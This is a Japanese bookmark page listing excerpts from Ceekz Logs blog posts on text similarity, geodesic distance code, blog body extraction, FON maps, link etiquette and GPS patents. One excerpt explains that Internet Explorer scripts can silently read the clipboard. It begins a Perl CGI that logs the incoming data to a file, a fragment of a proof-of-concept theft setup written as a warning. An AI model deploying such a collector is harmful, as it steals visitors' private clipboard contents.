タグ

ブックマーク / private.ceek.jp (8)

  • ライブドアがブログ画像検索を開始 - Ceekz Logs (Move to y.ceek.jp)

    nilab
    nilab 2009/07/29
    ライブドアがブログ画像検索を開始 - Ceekz Logs:社長日記で「ブログの画像検索のヒット率はかなり凄いです。画像検索はブログ中心でやったほうがいいんじゃないかと思う」
  • コサイン尺度(コサイン類似度)の計算 - Ceekz Logs (Move to y.ceek.jp)

    文書間の類似度を求める方法の一つとして、コサイン尺度が挙げられます。コサイン尺度とは、2つのベクトルのなす角度であり、文書をベクトル化することにより、文書間の類似度を求めることが出来ます。 sub cosine_similarity { my ($vector_1, $vector_2) = @_; my $inner_product = 0.0; map { if ($vector_2->{$_}) { $inner_product += $vector_1->{$_} * $vector_2->{$_}; } } keys %{$vector_1}; my $norm_1 = 0.0; map { $norm_1 += $_ ** 2 } values %{$vector_1}; $norm_1 = sqrt($norm_1); my $norm_2 = 0.0; map { $nor

    nilab
    nilab 2008/12/26
    コサイン尺度(コサイン類似度)の計算 - Ceekz Logs
  • ブログの本文抽出にチャレンジ - Ceekz Logs (Move to y.ceek.jp)

    zuzara.com を読んでいると、ブログの文抽出にチャレンジしているのを見つけました。 tdかdivで囲まれた文字列で、文章と比べてHTMLのタグがあまり多くないもののうち、一番文字数が多いのが文だろう、というアルゴリズム。 PHP で書かれたコードを Perl に移植しながら、もっと効率的なアルゴリズムが無いかを考えていました。 まずは、『タグの数』ではなく、比率をで判定するように改良(?)しました。 スコア = タグ除去後(length) / タグ除去前(length) タグが含まれていないときが最大値になるので、スコアは 1 が最大となります。タグの数よりもこっちの方が良さそうだったのだけど、コメント部分を抽出してしまう可能性が非常に高い。だめぽ。 牛乳を飲みつつ考えていると(カルシウムを摂取して身長を伸ばす)、ひらめきましたよ!要は、長い文章を取り出せればいいのだから、句読

    nilab
    nilab 2007/01/08
    ブログの本文抽出にチャレンジ - Ceekz Logs : 日本語の句読点がたくさん含まれる部分を本文とするプログラム
  • 世界測地系の座標計算 - Ceekz Logs (Move to y.ceek.jp)

    Google Maps を使ったウェブアプリを書いていたので、その派生物(関数)を。 # IN: latitude(from), longitude(from), latitude(to), longitude(to) # OUT: distance(meter) sub dist { my ($lat_1, $lon_1, $lat_2, $lon_2) = @_; my $pi = atan2(1, 1) * 4; my $radius = 6378140; $lat_1 = $lat_1 * $pi / 180; $lon_1 = $lon_1 * $pi / 180; $lat_2 = $lat_2 * $pi / 180; $lon_2 = $lon_2 * $pi / 180; my $deg = sin($lat_1) * sin($lat_2) + cos($lat_1)

    nilab
    nilab 2006/12/19
    世界測地系の座標計算 - Ceekz Logs : 緯度経度と距離の変換 : 地球を球体/真球と仮定して計算
  • Simple FON Maps - Ceekz Logs (Move to y.ceek.jp)

    Simple FON Maps というサービスを公開しました。その名の通り FON Maps をシンプルに表示するサービスです。オフィシャルは、情報量が多すぎて重いので…。 Simple FON Maps では、稼動している FON AP を中心に表示しています。 ・緑色のマーカー FON Access Points with Activity in the last hour 1時間以内にアクティブになった FON AP です。 ・黄色のマーカー All other FON Access Points 今までに1度でもアクティブになった FON AP です。 ・スター付き アクセスポータルのカスタマイズ 接続した後に表示されるトップページをカスタマイズしている FON AP です。ゲスト接続が可能である可能性が高いです。すなわち、ユーザ登録していなくても FON を楽しめる AP ですね

    nilab
    nilab 2006/12/18
    Simple FON Maps - Ceekz Logs : FON Maps をシンプルに表示するサービス
  • あなたのクリップボードが盗まれる - Ceekz Logs

    IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジェクトね。操作できる内容は、クリップボードにデータを読み込むこと(setData)、読み出すこと(getData)、消去すること(clearData)の3種類。 読み出すことも可能なんですよね。しかも、デフォルトでは、警告すら出ない。 以下のような、プログラムを準備しよう。 #!/usr/bin/perl use strict; my $file = '/tmp/cb.txt'; open (CB, ">> $file"); print CB "$ENV{'QUERY_STRING'}\n"; close (CB); print "Status: 301 Moved Permanently\n"; print "Location:

    nilab
    nilab 2005/11/24
    Internet Explorer
  • マナーの押し付けが嫌いだ - Ceekz Logs

    無断リンク禁止の話が、また再燃しているみたい。 僕は、マナーの押し付けは嫌いだ。自分と合わないマナーを主張している人が居れば、静かに立ち去ればいい。主張に止まらず「押し付け」ているなら、反論でもなんでもすればいい。 ということで、僕は、無断リンク禁止を主張している人の肩を持ち、無断リンク禁止の禁止を主張している人を冷たい目で見ることにしてる。もちろん、前者の考え方に賛同できるわけではないけどね。 後者は、主張から「押し付け」に進んでいる場合が多いので、まったく肩を持つ気になれない。考え方には、賛同できるけど… 前者が「押し付け」に進んでいるところを見たことはない(一部教育委員会は区内の学校に押し付けてるか)。 無断リンク禁止を主張する方は、自身のマナーを遂行するために、他者に「僕のページに勝手にリンクしないでほしい」と主張します。間違っても「君のページも無断リンク禁止にするべきだ」などと主

    nilab
    nilab 2005/11/14
    「啓蒙活動」という名の暴力かもしれない。押し付けが嫌だという考えには同意。
  • GPS 携帯を使ったサービスが出ない訳 - Ceekz Logs (Move to y.ceek.jp)

    GPS 携帯が出てきた当時は、アレもできるコレもできるという話をいっぱい聞いたような気がするのですが、一向にそんなサービスが出てきません。なんでだろうなぁ。と調べてみたところ特許で縛られているようです。 その一例をあげると位置依存サービスをしようとしても、携帯端末がGPSなどから取得した位置情報を何らかのメッセージ(メールを含む)でサーバに転送して、そのサーバから現在位置に関するコンテンツを携帯端末が受け取ると特許に抵触します。 まじかー。とりあえず、一次情報の特許電子図書館で調べてみる。 【発行国】 日国特許庁(JP) 【公報種別】 公開特許公報(A) 【公開番号】 特開2002-199423(P2002-199423A) 【公開日】 平成14年7月12日(2002.7.12) 【発明の名称】 座標ウェイポイントでメッセージにアクセスして記録するシステム及び方法 うーん。当っぽい。ま

    nilab
    nilab 2005/08/05
  • 1